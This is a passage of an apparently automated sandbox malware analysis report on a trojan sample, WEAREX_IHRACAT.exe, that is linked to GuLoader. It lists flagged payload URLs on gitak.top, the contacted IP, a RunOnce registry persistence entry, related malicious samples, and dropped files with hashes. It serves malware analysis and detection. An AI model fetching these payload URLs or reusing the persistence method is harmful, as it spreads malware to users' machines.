      https://gitak.top/Y~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin7~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/W~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/c~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdWEAREX_IHRACAT.exe, 00000002.00000001.1798696574.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.quovadis.bm0WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.bin(WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binAuthorityWEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/o~WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/9~WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      172.67.207.219
      		gitak.topUnited States
      		13335CLOUDFLARENETUSfalse

      General Information

      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1501093
      Start date and time:2024-08-29 12:37:38 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 13m 53s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:WEAREX_IHRACAT.exe
      Detection:MAL
      Classification:mal96.troj.evad.winEXE@3/10@1/1
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:
      • Successful, ratio: 71%
      • Number of executed functions: 46
      • Number of non-executed functions: 31
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, UserOOBEBroker.exe, WMIADAP.exe, conhost.exe, MoUsoCoreWorker.exe, UsoClient.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      12:40:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Aaregang C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe
      12:40:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Aaregang C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      172.67.207.219z15OrderN_24OS1275del26-08-2024_LTBLLC_.exeGet hashmaliciousGuLoaderBrowse
      • gitak.top/ylDilrpYb69.bin

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      gitak.topz15OrderN_24OS1275del26-08-2024_LTBLLC_.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      doc09125520240407073114.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 104.21.22.240
      HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 104.21.22.240
      qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
      • 172.67.207.219
      z9T__VAUSTRIATURK-TEKL__F.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 104.21.22.240
      z1_____________.exeGet hashmaliciousFormBook, GuLoaderBrowse
      • 172.67.207.219
      vV389MGvCt9jWzm.exeGet hashmaliciousLokibotBrowse
      • 188.114.97.3

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSmU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
      • 188.114.97.3
      d3d9x.dllGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      https://sgsconsulting.com/Get hashmaliciousUnknownBrowse
      • 104.17.25.14
      Invoice.htmGet hashmaliciousHTMLPhisherBrowse
      • 104.17.25.14
      mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
      • 188.114.96.3
      DHL Page1.exeGet hashmaliciousGuLoaderBrowse
      • 104.26.12.205
      Q8qimBtTQB.dllGet hashmaliciousMetasploitBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      Upit za prevoz 28 08 2024 1037 Agrorit d.o.o.exeGet hashmaliciousAgentTeslaBrowse
      • 172.67.74.152
      Autofill Manufacturing Sdn Bhd 28-08-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 188.114.97.3

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
      • 172.67.207.219
      AyyPZaqgaZ.exeGet hashmaliciousUnknownBrowse
      • 172.67.207.219
      Requesr for quotation-sample catalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
      • 172.67.207.219
      Programa de Mentoring y Apoyo a la Internacionalizaci#U00f3n.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      Teklif Talebi.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      5649237431_23-10-23-08.49.23.0107.07.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      Estado de cuenta y facturas..exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      fatura.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219
      227979659-051450-sanlccjavap0004-13413.exeGet hashmaliciousGuLoaderBrowse
      • 172.67.207.219

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllsample.exeGet hashmaliciousFormBook, GuLoaderBrowse
        sample.exeGet hashmaliciousGuLoaderBrowse
          8737768___19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
            8737768___19082024.vbsGet hashmaliciousGuLoaderBrowse
              Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                Q8QeOUbRK0.exeGet hashmaliciousGuLoaderBrowse
                  Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                    Thunderstore Mod Manager - Installer.exeGet hashmaliciousUnknownBrowse
                      URYmWe54UY.exeGet hashmaliciousDCRatBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:dropped
                        Size (bytes):416292
                        Entropy (8bit):7.844332745869164
                        Encrypted:false
                        SSDEEP:12288:NtjALF2QGm6An6r2vvCi1JQhmlfwfmgpTxDFlvT:HYUQcAn66C+JQhml4bhx3T
                        MD5:2E620407C0B25239EF46534A34217C27
                        SHA1:1751F775E9E9279757EC94C9F4CF63B01AF42525
                        SHA-256:A49B3780D9A1AF972B0E6D252284EDFF3B00E35713336456579431F1081DEBE4
                        SHA-512:14A0898606E1B8405EDB8B790F65EE207E4FE3E1DFDC4F21C6A5014730E80CDC5BFFAF9D5AF54FC8070CC59FD4873C16A89736FD8DD7733F900A8C6D14755457
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 58%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@..........................p...............................................t.......0..P6...........................................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc...P6...0...8...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):11264
                        Entropy (8bit):5.813979271513012
                        Encrypted:false
                        SSDEEP:192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
                        MD5:7399323923E3946FE9140132AC388132
                        SHA1:728257D06C452449B1241769B459F091AABCFFC5
                        SHA-256:5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
                        SHA-512:D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: sample.exe, Detection: malicious, Browse
                        • Filename: sample.exe, Detection: malicious, Browse
                        • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                        • Filename: 8737768___19082024.vbs, Detection: malicious, Browse
                        • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                        • Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
                        • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                        • Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
                        • Filename: URYmWe54UY.exe, Detection: malicious, Browse
                        Reputation:moderate, very likely benign file
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\nsrB208.tmp

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):745777
                        Entropy (8bit):5.134868187373461
                        Encrypted:false
                        SSDEEP:12288:cTrjMyfE4/Iv34vwEaSly2rjs2QD4bpPMwNP+qf:c1fvrCEHcqf
                        MD5:DF83E71E1F504BA452688A89CEBF2651
                        SHA1:6FF125C56A32F86EEBA91A003BCF03F3E571C355
                        SHA-256:3D5C790BC1C1A1708DD88368CC17ADC9C38FB2375D31E759373A1FCC38B47DEB
                        SHA-512:F567511563FAF0D4E5E47A1E1DA009807C8E5D8D158DE2B3BC2758C841445D9B54F2191C0755D1C2D341A69BD2F93348F645BCAB1EB87740D0D9AA147788E5BE
                        Malicious:false
                        Reputation:low
                        Preview::0......,................................/......:0..........................................................................................................................................................................................................................................G..._...............j...............................................................................................................................d...........K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\Modulsystemernes.Tie

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):211920
                        Entropy (8bit):7.504741823549338
                        Encrypted:false
                        SSDEEP:3072:kalBfm7DD6XYVXaeQ9O6hE4omcKJV1ICwQYm64BoHSoQq1CIrJmbLd7:kD7DDAe2O6hE4ou1Ivm640SwEWJ+J7
                        MD5:A2F5F04E983190C0354C8362548F3AF2
                        SHA1:241D36CB0F4490E394F914CB2876A2EECDDD4F9A
                        SHA-256:915CD18120B0827AFA12CA7D9C702A61F88541EED6D896779D62BA581251D573
                        SHA-512:62A7B90AA0CFF62A6EC316D312E39E786BAEB008CEC661EE4879E181353F82AF3F9F6771C6390CE1071BE42C38667897AA1E9AF5D8B05D06DBBC21337BC449DF
                        Malicious:false
                        Reputation:low
                        Preview:..........rrr...CC.................**.UU...u...................(.............!..............+.......--.....ttt..........................\\.k......l..~...f...................Y............CC............B..+..u.....................a...jjj.s....JJJ.....77...........#..&&.T...HH............ZZ.77........................y.......```.............ZZ....g.................<<..L......................................................................z......................vvvv..........................f..LLL.......2....r........l.uu.......h..Z.........DDDDD....... .....zzz...............$$$.............DD.WW.......M..........".N....l....H....................9.X...........K.................W............................KK./...........c..J.....nn.......,,,.f................^.........]...I......^..~~~~..........................vvv...V..............!!....^....EE........z.................vv..........33.........[..jj........................&..k.....%%%%%...e..{.................###.JJ.............ZZZZ.....--.

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\Sengeheste.txt

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):459
                        Entropy (8bit):4.242630904692509
                        Encrypted:false
                        SSDEEP:6:6nW2JmgMuFGRvTrhJXVD7u0DrFSWbfAZaIkJLRH9CFeaoaTgKgXJTfC53MZUcAzK:6WsLFmjlPXFtAZULRA8VKgXQCHw791Iz
                        MD5:1459E91F25E94A3A75C331FEE10CE27B
                        SHA1:98619C367B9C295221E9D419308A7160F927566B
                        SHA-256:71F06CE6041A49F416D50E6BC6FF252D44A4829209B9778352D5F03C8120CEA0
                        SHA-512:8FC53DB6ECC6902D55EA0CAFC09201FEEBF30B95B1613489D81031DBFB27F5D222F4AE29F5868081F9F864DB11030B0DE5234CB076C672EBF038B6DF730DA459
                        Malicious:false
                        Reputation:low
                        Preview:repositioning astronavigator brskurserne emirater spegeplsen laurustinus,banco bunket prostaglandin contrate storkunderabatter,medicinalfabrikker preprocessed opstrmmes hound,polysepalous focussable foederis elida radiofrequency repressaliernes specialprogrammernes pennine lufttrykkene..degenerating lumskt overpraticed feague omarrangerer kvadratrodstegnets brutalism sequacity svingfjers krageternes..solarieudlejningerne synders centaurdom cromme romjdos.

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\Soldede.Phy

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):443430
                        Entropy (8bit):2.6516475435571305
                        Encrypted:false
                        SSDEEP:1536:4KsgyDvUmRMEiHVKTdrWTjI4h4UK0I5ZVAmKNXUArf7bGSlFEiKEz+gNufpwX81G:LCyQi1vNbGoj28h02QD4bpPM1ONP7
                        MD5:0667E0457CC4EB7E2455A757544890F9
                        SHA1:110F026C12E0C1A53FC59424741580ADC6C1CBCA
                        SHA-256:EFF5D379FC2733E5FD0860EB112E465A364BCB19C9F0652E4CFC57DD87F739D0
                        SHA-512:A1E570E1B981E2AA8DC66D8909625E614E039E5052CE3F5C086F63F1400C45BD7DDA23E316BC1B3341AFCD8890E96F1681324C07B451821A8BEE1743D7061D5B
                        Malicious:false
                        Preview:000000ACACAC003A005800040000004F000000000000000000000054004100B10000000094006B001A1A1A1A00FB00000000C9C90000020200A700D2004D0034343400330000007E7E002500000000636363001C1C1C1C1C1C00B7B7000000BABA00E80000860000220000000000000000C8C800000000001F1F1F000000262600007373001F000000A500000000000200000000A00000000000000D0D000007008F8F8F0000009D000200FBFB001600FAFAFA000000004F4F4F0000AA00002727000000009E9E9E9E9E005500009C9C000000EE00D40000C600F300009500B90041006B6B00EC00590000006E0000002A2A2A2A0000710000F80000000C0000ECEC001D1D000000D7000909000000B5000000F7F7F700787878780036000000E70033007400000404008C8C8C0000002800000077777700CECECE003700004A4A00000000008F00666600000074001C1C00290000AF00006C00005C5C002525250000F2005400000000FD0000DF0000CC0000CDCDCD001600000000006161001400000000FD0031313100530000000000530000000000006F00FFFFFF000000EBEBEB003700009595959595959500BB00FEFE0000E2E2E20000BF00C7C7006E00565656560000E600F9F9F900B6000000000000009E00260000D30000008080009B9B9B9B006F0000E8E8E8E8E8E80000009700

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\hulen.urh

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2857
                        Entropy (8bit):3.0576925960783385
                        Encrypted:false
                        SSDEEP:48:7jDlwCYXrZEulT+rBVMgyyTuSAa8MIQxxHFFTh/A:HdYXrZXSrHMgd38xQjFth/A
                        MD5:731DFA6DF00249CAC29566287712DB7E
                        SHA1:D0395A078EDEDE1FFF4B5F6921549257F9128864
                        SHA-256:1A039C58A7D2CA90AFFCF28F5ADBA163CE0E38109A8E258E28D49F5D9A5E157C
                        SHA-512:9F0586D745C8DF4F12329E34E2BF7FCC78C6725E631C760AA912BD3628955E26D56AA466009C4948CB1253839D09EC7DF6725C34A67E3B3B51670CB77AE01499
                        Malicious:false
                        Preview:....u......6.....:............................EU.....z..B..........k...w.....................f.....v.........Y..........................v......wF.....=.........s..............E.................:......B......... _....<....a.*.......A.................;......y........l..................#.................t.......................I.....}3...e.............................k..................................].t...............Q....................7...=......!..................."...}.............i..............................R.D._....8.u............K...........Q.........'..............n....C.........K......>........2.......i......................Q.....*.........F..+...X........%?.....0...T...............DX...;.}..........j.......c............N..r...........`............................v........=n.....*Q.............Y....QL.......Q..........b..........s.".......0.~...!?...]........^.............c..........(_.......................g.........X...F........'...N...........0....D...............T....

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\isvintrene.gaf

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):22218
                        Entropy (8bit):3.264646650126842
                        Encrypted:false
                        SSDEEP:384:YtjNZ40VIDz3Wddjx2SLfNmEmvgT4mvw/PuKWxidvyQey:YxbRk3WdFxtQ9vz/PXyly
                        MD5:3FB3828F8898D364F7EE5607547E6040
                        SHA1:9EA56ECEB3D57AB5AE8D3434A157BAECF424715F
                        SHA-256:51A0A1D3B04F367EA6F0294222D49E1D351376577ACE15734340092D11391081
                        SHA-512:725671BF74696E2B502BC19352FFF96BA9E7A58064FE83EBD1D4C693DC1B7083098A26C2174FA97AA9D3C832DD119B9C6F05E585E1633FB5C7733D2983842AA0
                        Malicious:false
                        Preview:*.......................................v.'.....................w............E...........@.............K...:...q.......................9......b........l....I..C...]............{.!.4.q.........T.......2...........n.pg.....p..........N......................Lj...............V..........xS..|....]....[....P...........F.....q~............................o...*...I"%........).X........}..............................E6...[........G..........G.........[..........Q........e................v...........f...7.f.....H....................c..*........a.>........+......r........#........~..............4...................r.........................................kU:......&-.....`.N...b.......q.....]....&......+...............................................................R..g.&.............>........%......O...........f.....a.......X.....u..........D.............................................Y.......M......E..........................................4.......................................9.b..../.

                        C:\Users\user\gangningerne\jot\mtn\Discomplexion\rustling.avi

                        Download File
                        Process:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41243
                        Entropy (8bit):3.219354776148546
                        Encrypted:false
                        SSDEEP:768:u4wnuDGKamnhCdUqMxoGyTM4XPYvMiCbR3dGLq:UmAdeoJ/Y7aRtr
                        MD5:46E9E6BF651E043A929B22B6E20B22C2
                        SHA1:C2E94B4CE6F9328A063B9A6E2427ADF528735164
                        SHA-256:5A12E8D8793E33175392D0743BCE73E93F877DCB1D9933079A19ADD4161D6D97
